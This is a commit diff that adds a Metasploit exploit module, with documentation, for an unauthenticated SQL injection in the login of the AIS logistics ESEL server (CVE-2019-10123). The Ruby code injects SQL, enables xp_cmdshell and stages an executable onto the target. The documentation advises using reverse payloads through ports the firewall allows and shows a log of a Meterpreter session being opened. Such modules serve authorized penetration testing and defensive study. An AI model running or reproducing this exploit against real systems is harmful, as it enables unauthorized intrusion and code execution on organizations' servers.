Land #11641, Add AIS RCE

documentation/modules/exploit/windows/misc/ais_esel_server_rce.md

@@ -0,0 +1,69 @@
+## Description
+
+    This module will execute an arbitrary payload on an "ESEL" server used by the
+    AIS logistic software. The server typically listens on port 5099 without TLS.
+    There could also be server listening on 5100 with TLS but the port 5099 is
+    usually always open.
+    The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
+    with the sa user is in place.
+
+    This module was verified on version 67 but it should also run on lower versions.
+    An fixed version was created by AIS in September 2017. However most systems
+    have not been updated.`
+
+    In regard to the payload, unless there is a closed port in the web server,
+    you dont want to use any bind payload. You want a "reverse" payload,
+    probably to your port 80 or to any other outbound port allowed on the firewall.
+
+    Currently, one delivery method is supported
+
+    This method takes advantage of the Command Stager subsystem. This allows using
+    various techniques, such as using a TFTP server, to send the executable. By default
+    the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+
+    NOTE: This module will leave a payload executable on the target system when the
+    attack is finished.
+
+## Vulnerable Application
+
+  The application is not publicily available. It was tested on Esel version 67 but should also work an versions below.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/misc/ais_esel_server_rce`
+  3. `set RHOSTS <IP>`
+  4. `check`
+  5. **Verify** "Server is vulnerable"
+  6. `run`
+  7. **Verify** Session opened
+
+
+## Scenarios
+
+    msf5 > use exploit/windows/misc/ais_esel_server_rce 
+    msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
+    rhosts => 10.66.75.212
+          msf5 exploit(windows/misc/ais_esel_server_rce) > check
+          [+] 10.66.75.212:5099 - The target is vulnerable.
+    msf5 exploit(windows/misc/ais_esel_server_rce) > run
+
+    [*] Started reverse TCP handler on 10.66.75.208:4444 
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+          ...
+    [*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [*] Sending stage (179779 bytes) to 10.66.75.212
+    [*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
+    [!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
+    [*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
+    [*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100
+
+    meterpreter > getuid
+    Server username: NT Service\MSSQL$AIS
+

modules/exploits/windows/misc/ais_esel_server_rce.rb

@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::MSSQL_COMMANDS
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
+      'Description'    => %q{
+        This module will execute an arbitrary payload on an "ESEL" server used by the
+        AIS logistic software. The server typically listens on port 5099 without TLS.
+        There could also be server listening on 5100 with TLS but the port 5099 is
+        usually always open.
+        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
+        with the 'sa' user is in place.
+
+        This module was verified on version 67 but it should also run on lower versions.
+        An fixed version was created by AIS in September 2017. However most systems
+        have not been updated.
+
+        In regard to the payload, unless there is a closed port in the web server,
+        you dont want to use any "bind" payload. You want a "reverse" payload,
+        probably to your port 80 or to any other outbound port allowed on the firewall.
+
+        Currently, one delivery method is supported
+
+        This method takes advantage of the Command Stager subsystem. This allows using
+        various techniques, such as using a TFTP server, to send the executable. By default
+        the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+
+        NOTE: This module will leave a payload executable on the target system when the
+        attack is finished.
+
+      },
+      'Author'         =>
+        [
+          'Manuel Feifel'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-10123'],
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Payload'        =>
+        {
+          'BadChars'  => "\x00\xff\x27",
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+        ],
+      'CmdStagerFlavor' => 'vbs',
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => '2019-03-27',
+      'DefaultOptions' =>
+        {
+          'RPORT' => 5099
+        },
+      ))
+  end
+
+  # This is method required for the CmdStager to work...
+  def execute_command(cmd, _opts)
+    cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
+    send_login_msg(create_login_msg_sql(cmd_xp))
+  end
+
+  # prepends the required length to the message and sends it to the server
+  def send_login_msg(login_msg, check_response = true)
+    length = login_msg.length
+    length += length.to_s.length
+    login_msg = "#{length}#{login_msg}"
+
+    connect
+
+    sock.put(login_msg)
+    response = sock.recv(10000)
+
+    if check_response
+      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
+        print_good('Correct response received => Data send successfully')
+      else
+        print_warning('Wrong response received => Probably data could not be sent successfully')
+      end
+    end
+
+    return response
+  ensure
+    # Every time a new Connection is required
+    disconnect
+  end
+
+  # embeds a sql command into the login message
+  def create_login_msg_sql(sql_cmd)
+    return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
+  end
+
+  # create a plain login message
+  def create_login_msg(pw)
+    delim = "\xFF"
+    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
+                "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
+
+  end
+
+  def check
+    int = rand(1..1_000)
+    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
+    if response_bypass.include? 'Zugangsdaten OK'
+      CheckCode::Vulnerable
+    else
+      print_status("Response was: #{response_bypass}")
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    # enable xp cmdshell, used to execute commands later
+    # Software uses the 'sa' user by default
+    send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
+    # The porotocol has no limites on max-data
+    execute_cmdstager({ :linemax => 1500 })
+    print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
+    print_status('Stager should now be executed.')
+  end
+end